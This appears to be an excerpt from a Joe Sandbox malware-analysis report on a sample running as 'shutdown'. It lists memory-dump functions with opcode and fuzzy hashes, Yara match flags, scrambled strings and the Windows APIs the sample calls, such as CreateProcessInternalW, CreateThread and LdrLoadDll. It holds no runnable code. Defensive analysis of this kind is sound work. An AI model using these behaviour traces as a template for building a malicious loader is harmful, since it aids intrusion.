                      • Opcode Fuzzy Hash: 1559b2fd704d47c78065b338e45a55bbbe09f88aca71693c1b3daa9eecc97276
                      • Instruction Fuzzy Hash: 3890022131554403E140B159541C6064049D7E1301F55D015E0414554CDA1689565223
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 33c23560ab9c5efc91b02a8242bfb80e8df71ef24fe3eb0ccb5b5c0be184c525
                      • Instruction ID: 9bedd2810ebae4f3fcfa0dde0e19d5f013a5f92e24a95f57d8c95e4903a6b881
                      • Opcode Fuzzy Hash: 33c23560ab9c5efc91b02a8242bfb80e8df71ef24fe3eb0ccb5b5c0be184c525
                      • Instruction Fuzzy Hash: 4D90023121554802E100B599540C646004987E0301F55D015A5024555EC76689916132
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c3b754a91323d119b13720136250c9395457320753aeabbe9718767821d5faab
                      • Instruction ID: 7171124e305b48344b3e35df9ce6ff978f6e9fc997fe1dfb9f30bd8bdf8ac42b
                      • Opcode Fuzzy Hash: c3b754a91323d119b13720136250c9395457320753aeabbe9718767821d5faab
                      • Instruction Fuzzy Hash: 6F9002312155CC02E110B159840874A004987D0301F59C415A4424658D879689917122
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 9f85e1fa3f1c7d5c9538e11d1e9ecc374f1d541ff24235f0ea3b6c737300ffa9
                      • Instruction ID: 60b53f15e1125450bdbbb2af12e44dbdc9109de79503a3e853cc371bd79cf320
                      • Opcode Fuzzy Hash: 9f85e1fa3f1c7d5c9538e11d1e9ecc374f1d541ff24235f0ea3b6c737300ffa9
                      • Instruction Fuzzy Hash: D090023121554C42E100B1594408B46004987E0301F55C01AA0124654D8716C9517522
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: c928fdde73c3765d68dbfe0f904bdc1082e08b12f2ca4126cf0edc96c4151ef8
                      • Instruction ID: adea4644ca7f9cd8a447dc37a443f4352f722ef4c40a82e623f0ad0c3e63ba17
                      • Opcode Fuzzy Hash: c928fdde73c3765d68dbfe0f904bdc1082e08b12f2ca4126cf0edc96c4151ef8
                      • Instruction Fuzzy Hash: 7490023161964802E100B1594518706104987D0201F65C415A0424568D87968A5165A3
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: ca53c3800d5bb8d5dcc4bb3383f16a1f7c3a4da90b363b6a1a7abf9b58f189f1
                      • Instruction ID: bb0d25f9184b2db0be912d85965f8ef624ae6f07ac16213cb065b83e9717ce10
                      • Opcode Fuzzy Hash: ca53c3800d5bb8d5dcc4bb3383f16a1f7c3a4da90b363b6a1a7abf9b58f189f1
                      • Instruction Fuzzy Hash: 3590022125959502E150B15D44086164049A7E0201F55C025A0814594D865689556222

                      Control-flow Graph

                      control_flow_graph 462 3240e48-3240e4a 463 3240e4c-3240e4d 462->463 464 3240ead-3240eca 462->464 467 3240e4f 463->467 468 3240e0a-3240e0b 463->468 465 3240f34-3240f42 464->465 466 3240ecc-3240ecd 464->466 471 3240f48-3240f7a call 3231410 call 3251580 465->471 472 3240f43 call 32448d0 465->472 469 3240f0e-3240f43 call 325a240 call 325ac50 call 32448d0 466->469 470 3240ecf-3240ee2 466->470 473 3240e64-3240e70 467->473 474 3240e51-3240e5d 467->474 469->471 470->469 484 3240f7c-3240f8b PostThreadMessageW 471->484 485 3240f9a-3240fa0 471->485 472->471 473->464 474->473 484->485 487 3240f8d-3240f97 484->487 487->485
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 3y36225$3y36225
                      • API String ID: 0-273086695
                      • Opcode ID: a4591cf4fa2a2146a6b4ca358de84c6a80a448c5c9c76962448731accce70402
                      • Instruction ID: a95ee46456ceb34115a131f55f5420bcc02417355bc9ecc89d241d615f9db62f
                      • Opcode Fuzzy Hash: a4591cf4fa2a2146a6b4ca358de84c6a80a448c5c9c76962448731accce70402
                      • Instruction Fuzzy Hash: 0731ABB081534A7AD701DAB4CC41DEFFF6CDF42260F04C195EA10AB241D2744A96CBE1

                      APIs
                      • PostThreadMessageW.USER32(3y36225,00000111,00000000,00000000), ref: 03240F87
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID: 3y36225$3y36225
                      • API String ID: 1836367815-273086695
                      • Opcode ID: b636840553059b66cf61889193f296b746fdceec7e56f9360eb77bb6e0130ae5
                      • Instruction ID: 4fbf21e93886596191e27201b094a378b6e995ba79fef4844a043b978ed75e01
                      • Opcode Fuzzy Hash: b636840553059b66cf61889193f296b746fdceec7e56f9360eb77bb6e0130ae5
                      • Instruction Fuzzy Hash: A001C0B6D4130D7AEB01EAE08C81DEFBB7CEF41294F058164FA04AB140E6785E468BE1
                      APIs
                      • Sleep.KERNELBASE(000007D0), ref: 03252F1B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: net.dll$wininet.dll
                      • API String ID: 3472027048-1269752229
                      • Opcode ID: 72cb69e589b892c01563f413b3cf65d0fa6ca5d86aef188049afa5280b4bd624
                      • Instruction ID: ef5bdd6dc0f10008c54901914cd3f35799a55e85ecbbee40ccea64811de48321
                      • Opcode Fuzzy Hash: 72cb69e589b892c01563f413b3cf65d0fa6ca5d86aef188049afa5280b4bd624
                      • Instruction Fuzzy Hash: 89316DB5611705ABD714DF64DC85FE7BBB8EB48704F04891DBA1D9B280D6B0B6848BA0
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0324EF97
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Initialize
                      • String ID: @J7<
                      • API String ID: 2538663250-2016760708
                      • Opcode ID: 57100c11c2c74324ef82bf3a0ff969db338d334605395a616696048de9bcf25b
                      • Instruction ID: 76df7ef8af98454b2d5021de3bb4acc826859b1a01c6ecddbc109a682a8a95d9
                      • Opcode Fuzzy Hash: 57100c11c2c74324ef82bf3a0ff969db338d334605395a616696048de9bcf25b
                      • Instruction Fuzzy Hash: EB3162B5A1020AAFDB10DFD8C8809EFB7B9FF88304B148559E505EB214D771EE45CBA0
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 0324EF97
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Initialize
                      • String ID: @J7<
                      • API String ID: 2538663250-2016760708
                      • Opcode ID: 9d2cfcdf1ffe3e67a65421843a7bad9a0ebaa40a1ace3f2a3fe73cb335089e24
                      • Instruction ID: 5896a4be55560b84ef7467cd9d718d54c28a7d9c7734c44990d97363a67dbce5
                      • Opcode Fuzzy Hash: 9d2cfcdf1ffe3e67a65421843a7bad9a0ebaa40a1ace3f2a3fe73cb335089e24
                      • Instruction Fuzzy Hash: 893132B5A1060AAFDB04DFD8D8809EFB7B9FF88304B108559E905EB214D775EE45CBA0
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03244942
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 942a60e6e87afde0c01754d0e8ffe965a11c5306625b664f60415aee2c061237
                      • Instruction ID: e8b23adb66741744406a83ddacb1e6c2d898e1cdf7d269c4eb3d30e9bb49e7b6
                      • Opcode Fuzzy Hash: 942a60e6e87afde0c01754d0e8ffe965a11c5306625b664f60415aee2c061237
                      • Instruction Fuzzy Hash: 2B015EB9E1020EABDF10EAE5DC45F9DB3789B14208F0442A5AD099B240F670E784CB91
                      APIs
                      • CreateProcessInternalW.KERNELBASE(00000044,00000000,00000000,0000000C,00000000,0324B03C,?,?,?,00000000,?,0324B03C,00000000,0000000C,00000000,00000000), ref: 03258723
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateInternalProcess
                      • String ID:
                      • API String ID: 2186235152-0
                      • Opcode ID: c645de62c93a6ff0c5e61469aa2b5a2d495b08286b884989e28a46b387e334de
                      • Instruction ID: 078d2f0fb33be25e7421d83d4afd14f7d0f4a6e444328cbfdcf8be9387bb87cf
                      • Opcode Fuzzy Hash: c645de62c93a6ff0c5e61469aa2b5a2d495b08286b884989e28a46b387e334de
                      • Instruction Fuzzy Hash: B901C0B2214208BBCB44DE89DC80EEB77ADAF8D754F008108BA09E7240D630FC518BA4
                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03239765
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: 2ac34e68cfbe189370e557a7f5bc0fcf54cd68683431eb97cbda2f41cd0c74f5
                      • Instruction ID: 0e83f9b76c6562beaeeb4128a6d81d7320ff582d248ad4f9a1dc32924c0cae91
                      • Opcode Fuzzy Hash: 2ac34e68cfbe189370e557a7f5bc0fcf54cd68683431eb97cbda2f41cd0c74f5
                      • Instruction Fuzzy Hash: EAF0657739030436E720A5A99C02FD7B74C8B85671F140025FB0DEF2C0D9F2B58146E5
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 03244942
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 06016602d0770ca522341d27ffd274018231073a67a5a0f8347fd14216fd37da
                      • Instruction ID: ed64406cdea01b3a92e0e8384889970fac11b5d9a2e99a69b34872d90fefa832
                      • Opcode Fuzzy Hash: 06016602d0770ca522341d27ffd274018231073a67a5a0f8347fd14216fd37da
                      • Instruction Fuzzy Hash: BDF08275E5420EABDB14EE95DC42F9DF3A8EF44618F0482D9EE099B140E270EA948B80
                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03239765
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateThread
                      • String ID:
                      • API String ID: 2422867632-0
                      • Opcode ID: 7de56493fe62f160b7e9a195c7ae58a8c0bca6f66fc7dc7aefcb56ccb3a165ff
                      • Instruction ID: bd363c87f53a6d836c3eea22441a56628ce7036afe7118c02bf5bba0442692a2
                      • Opcode Fuzzy Hash: 7de56493fe62f160b7e9a195c7ae58a8c0bca6f66fc7dc7aefcb56ccb3a165ff
                      • Instruction Fuzzy Hash: EDF09B7729031036E731A6A94C41FE76B988F85761F240155F60DEF2C0D9F6B58146A5
                      APIs
                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84589F4,00000007,00000000,00000004,00000000,032441AA,000000F4,?,?,?,?,?), ref: 0325866C
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID:
                      • API String ID: 3298025750-0
                      • Opcode ID: 7b89a264751e4e95cb903b6f32873bd17e7dfa8da40c9c63da6e5e9cc1a879b7
                      • Instruction ID: d3c97d8def18bb502e139ef188dfb98ee0afb24ce816ad644bbacb978b28e1f9
                      • Opcode Fuzzy Hash: 7b89a264751e4e95cb903b6f32873bd17e7dfa8da40c9c63da6e5e9cc1a879b7
                      • Instruction Fuzzy Hash: 05E06D75200208BBD610EE98DC41FAB33ADEFC5750F004408F909AB280C7B1BD5087B4
                      APIs
                      • RtlAllocateHeap.NTDLL(00000104,E5B4FE69,0325115C,E5B4FE69,?,0325115C,E5B4FE69,00000104,E5B4FE69), ref: 0325861F
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 02cca49e38662a387e86f34c886256fbfbf58bcc0c36bb4ecc6beab4d21673a2
                      • Instruction ID: f61abaa8f2602f5eecf71acb9105263e73f762b3fa65a9d79d32afd83a2e21a7
                      • Opcode Fuzzy Hash: 02cca49e38662a387e86f34c886256fbfbf58bcc0c36bb4ecc6beab4d21673a2
                      • Instruction Fuzzy Hash: 13E06DB5200304BBD614EF98DC41E9B73ADEFC5710F004409FA09A7281C671BA10C7B5
                      APIs
                      • GetFileAttributesW.KERNELBASE(0324D478,?,?,0324D478,00000000,?), ref: 032481AC
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: b65d524594dfd763b63631b7f498ec3f3d8a8f52e4cb3aebfcaed48d9883c848
                      • Instruction ID: 28f67e3e06216c43f8ef59a5309c5bc9ec227498f2c6bd010b7774b388af53bf
                      • Opcode Fuzzy Hash: b65d524594dfd763b63631b7f498ec3f3d8a8f52e4cb3aebfcaed48d9883c848
                      • Instruction Fuzzy Hash: 61E0203157030427FB24EA7CDC81FA233485744A24F1C4650F81CCF3C1E579F5814150
                      APIs
                      • SetErrorMode.KERNELBASE(00008003,?,?,03241E00,03257097,03254977,?), ref: 03247FC3
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 84e2752809c27ab60bf4aa07ba5ed2ac725a2fee77e06e22d8040cb19d98deef
                      • Instruction ID: c20152702db432c9872a6b47f662bc986e060e87da8d4d9f0b965b4f5cdc5528
                      • Opcode Fuzzy Hash: 84e2752809c27ab60bf4aa07ba5ed2ac725a2fee77e06e22d8040cb19d98deef
                      • Instruction Fuzzy Hash: DAD05E752903043BF740FAB58C02F963A8C9B40654F194464FA1CEB2C2E9A5F1904A65
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: cdf1beaa57eadee6344e5dd9b72b59f47c993d8e93d0d1083e4c4f1bfd1f4826
                      • Instruction ID: fcbd6d5c1f22b7737b8d6ffe7b8c468634a6f264dcf801446eab4f48ddcb9496
                      • Opcode Fuzzy Hash: cdf1beaa57eadee6344e5dd9b72b59f47c993d8e93d0d1083e4c4f1bfd1f4826
                      • Instruction Fuzzy Hash: DDB09B719055C5C5EA11E760470C7177A58A7D0741F19C4A5D2430641E4739C5D1E176
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2565554159.0000000003C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3c90000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                      • API String ID: 0-3754132690
                      • Opcode ID: 523daa0da8f4ff66d2731e2799678fc3fcb5e4ffe0dce2b60af0a7f21ea7dda8
                      • Instruction ID: dd5895c3d47f3d5cbf123418cd5a7e78b5c0d62fef090022c3596466af49291d
                      • Opcode Fuzzy Hash: 523daa0da8f4ff66d2731e2799678fc3fcb5e4ffe0dce2b60af0a7f21ea7dda8
                      • Instruction Fuzzy Hash: A39130F04082948ACB158F55A0652AFFFB1EBC6305F15816DE7A6BB243C3BE8905CB95
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2565554159.0000000003C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C90000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3c90000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: `-<$"+`f$"c4$$%!-+$%#"c$%/-8$).<`$)c-<$+)c;$-+)c$-8%#$-:%*$-<< $4! `$4! w$8! g$8)48$< %/$=q|b$`%!-$c$8!$cfw=$q|bt$u`%!
                      • API String ID: 0-3499896765
                      • Opcode ID: e6b4b2ab05f9298f447de5994603ee0b5e9049708a210888d9cf51619ee37bdd
                      • Instruction ID: b933b828833450870b654e885b0ab25c788a29c13439e8e4b9e7ab1ab834a00d
                      • Opcode Fuzzy Hash: e6b4b2ab05f9298f447de5994603ee0b5e9049708a210888d9cf51619ee37bdd
                      • Instruction Fuzzy Hash: CD2164B040430DEACF19DF90E991BDEBBB0FF14304F81A14AE959AF241CA718659CB85
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                      • API String ID: 48624451-2108815105
                      • Opcode ID: ecce41a6d622b4d7bb2ef8a62ef6d41134aa5001dd273f33454dc0f2dddb7365
                      • Instruction ID: f0e7189c0ddb0894a5b5587f064e925538ef68cf0a1afb8dbfccd1e9c426727a
                      • Opcode Fuzzy Hash: ecce41a6d622b4d7bb2ef8a62ef6d41134aa5001dd273f33454dc0f2dddb7365
                      • Instruction Fuzzy Hash: 7651DBB5A00256BFCB11DF98CA909BEF7BCFB49240B148969E4A9D7641D734DE40C7E0
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: ___swprintf_l
                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                      • API String ID: 48624451-2108815105
                      • Opcode ID: f6b6dd1fa85a5c2f243693858a78e71902aee538b37508eb716873451031ed4c
                      • Instruction ID: ec7dcef1dbeefa7fc2c3d702b9a6e9d5adedf1c1d0398dc91253d00dbb991032
                      • Opcode Fuzzy Hash: f6b6dd1fa85a5c2f243693858a78e71902aee538b37508eb716873451031ed4c
                      • Instruction Fuzzy Hash: 2551D5B5A006A5AFDB70DF9CC890A7EBBF9EF44200B44C86EE496D7641E774DA40C760
                      Strings
                      • Execute=1, xrefs: 039E4713
                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 039E4787
                      • ExecuteOptions, xrefs: 039E46A0
                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 039E4725
                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 039E4655
                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039E46FC
                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 039E4742
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                      • API String ID: 0-484625025
                      • Opcode ID: 352a68902c4da1d2897b3f24e0df25038ba288e1b502e8c12755d1f114da1290
                      • Instruction ID: 00fa426f0eabbc5d9d3be013aebd692fcd90f300c3396ace3c29954c8d050cc1
                      • Opcode Fuzzy Hash: 352a68902c4da1d2897b3f24e0df25038ba288e1b502e8c12755d1f114da1290
                      • Instruction Fuzzy Hash: BE511635A007197ADF21EBECDC86BEE73BCEF84344F0406A9E505AB191E7719A418F91
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                      • Instruction ID: ec4a643fcceb6b4771c27cb00660888b56fcc3ea4dc6d8cb334ac8120b01ee8f
                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                      • Instruction Fuzzy Hash: A1021475608341AFC305CF18C994A6BBBF5EFC9700F048A2EF9999B264DB71E905CB52
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: __aulldvrm
                      • String ID: +$-$0$0
                      • API String ID: 1302938615-699404926
                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                      • Instruction ID: e0946374d001b9f5be0feaf9794be80f4ab2a54296c8dcf1f6cca8223bbac884
